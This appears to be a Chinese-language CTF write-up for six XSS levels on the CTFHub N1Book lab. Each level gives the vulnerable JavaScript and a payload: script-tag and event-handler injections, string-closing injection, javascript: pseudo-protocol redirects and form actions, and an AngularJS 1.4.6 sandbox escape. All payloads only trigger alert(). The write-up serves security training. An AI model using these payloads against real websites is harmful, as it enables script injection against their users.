CTFHub_N1Book-XSS闯关（XSS）

N1Book-第二章Web进阶-XSS的魔力-XSS闯关

第一关

简单的反射xss

前端代码

<div<span>welcome xss</span></div>

payload

/level1?username=xss<script>alert(1)</script>
/level1?username=xss%3Csvg/onload=alert()

第二关

输出点在script中，闭合好语句即可

前端代码

<script type="text/javascript">
    if(location.search == ""){
        location.search = "?username=xss"
    }
    var username = 'undefined';
    document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
</script>

payload

/level2?username=xss';alert(1);//

第三关

domxss 用户输入将被js动态的写入html中

前端代码

<script type="text/javascript">
    if(location.search == ""){
        location.search = "?username=xss"
    }
    var username = 'xss';
    document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
</script>

payload

/level3?username=xss<img src=x onerror=alert``>
/level3?username=xss<img src=x onerror=alert(1) />

第四关

js跳转带来的xss 跳转到伪协议

前端代码

<script type="text/javascript">
    var time = 10;
    var jumpUrl;
    if(getQueryVariable('jumpUrl') == false){
        jumpUrl = location.href;
    }else{
        jumpUrl = getQueryVariable('jumpUrl');
    }
    setTimeout(jump,1000,time);
    function jump(time){
        if(time == 0){
            location.href = jumpUrl;
        }else{
            time = time - 1 ;
            document.getElementById('ccc').innerHTML= `页面${time}秒后将会重定向到${escape(jumpUrl)}`;
            setTimeout(jump,1000,time);
        }
    }
    function getQueryVariable(variable)
    {
           var query = window.location.search.substring(1);
           var vars = query.split("&");
           for (var i=0;i<vars.length;i++) {
                   var pair = vars[i].split("=");
                   if(pair[0] == variable){return pair[1];}
           }
           return(false);
    }
</script>

payload

/level4?jumpUrl=javascript:alert()

第五关

表单自动提交且action可控控制表单提交到伪协议的地址

前端代码

<script type="text/javascript">
    if(getQueryVariable('autosubmit') !== false){
        var autoForm = document.getElementById('autoForm');
        autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
        autoForm.submit();
    }else{
        
    }
    function getQueryVariable(variable)
    {
           var query = window.location.search.substring(1);
           var vars = query.split("&");
           for (var i=0;i<vars.length;i++) {
                   var pair = vars[i].split("=");
                   if(pair[0] == variable){return pair[1];}
           }
           return(false);
    }
</script>

payload

/level5?action=javascript:alert()&autosubmit=1

第六关

angular.js 二次渲染导致的xss

前端代码

<html lang="zh"><head>
<meta charset="UTF-8">
<title>XSS配套测试平台</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link rel="stylesheet" href="https://houtai.baidu.com/v2/csssdk">
<script type="text/javascript" src="main.js"></script>
<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script>
<style>
    html, body, .app-wrapper {
        position: relative;
        width: 100%;
        height: 100%;
        margin: 0;
        padding: 0;
    }
</style>
</head>
<body>
    <div id="root" class="app-wrapper amis-scope" ng-app=""><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">welcome xss</span></div></div></div></div></div></div>
    <script type="text/javascript">
    if(location.search == ""){
        location.search = "?username=xss"
    }
</script>

</body></html>

payload

/level6?username={{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1} } };alert(1)//%27);}}

最终拿到flag

原文地址：https://www.cnblogs.com/zhengna/p/15935768.html